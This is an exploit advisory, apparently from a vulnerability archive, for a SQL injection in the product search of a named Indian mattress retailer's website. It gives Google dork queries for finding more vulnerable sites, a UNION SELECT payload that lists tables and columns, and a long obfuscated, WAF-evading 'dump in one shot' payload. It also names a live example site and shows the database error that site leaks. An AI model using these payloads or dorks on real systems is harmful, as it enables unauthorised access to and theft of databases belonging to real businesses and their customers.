SleePedia.in an initiative of SleepwellFoundation India Nepal Bhutan SQL Injection Vulnerability

2018.06.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : SleePedia.in an initiative of SleepwellFoundation India Nepal Bhutan SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 21/06/2018 # Vendor Homepage : sleepedia.in ~ sleepwellfoundation.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dorks : inurl:''/products/searchByKeyword/?keyword_search='' inurl:''/cms/store_locator'' inurl:''/products/product_detail/'' # Note : Search in this domain extensions => site:np site:in site:bt site:com site:net site:org # Exploit : /products/searchByKeyword/?keyword_search=.1' + Data => LOCALHOST/products/searchByKeyword/?keyword_search=.1%27%20union%20select%201,2,3,4,group_concat(table_name,column_name),6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database()--+- + Dump in one shot => LOCALHOST/products/searchByKeyword/?keyword_search=.1%27%20union%20select%201,2,3,4,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database()--+- ################################################################################################# # Example Site : sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1%27 => [ Proof of Concept for SQL Inj ] => archive.is/8wz2E # SQL Database Error : A Database Error Occurred Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or V.product_Specification like '%.1'%' group by V.pid' at line 10 SELECT V.`id`, V.`cid`, V.`scid`,V.`pid`, V.`product_name`, V.`length`, V.`thickness`, V.`breadth`, V.`price`, V.`status`, V.`state`,P.slug, P.detail_image FROM `sw_product_variant` V, sw_product P WHERE V.pid = P.id AND V.`status` = '1' AND P.status='1' AND V.price!='0' AND V.list_show='1' AND V.state='' and V.product_name like '%.1'%' or V.product_Specification like '%.1'%' group by V.pid Filename: models/Product_model.php Line Number: 1152 + Proof of Concept : archive.is/h20Ww - archive.is/hKhSa ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top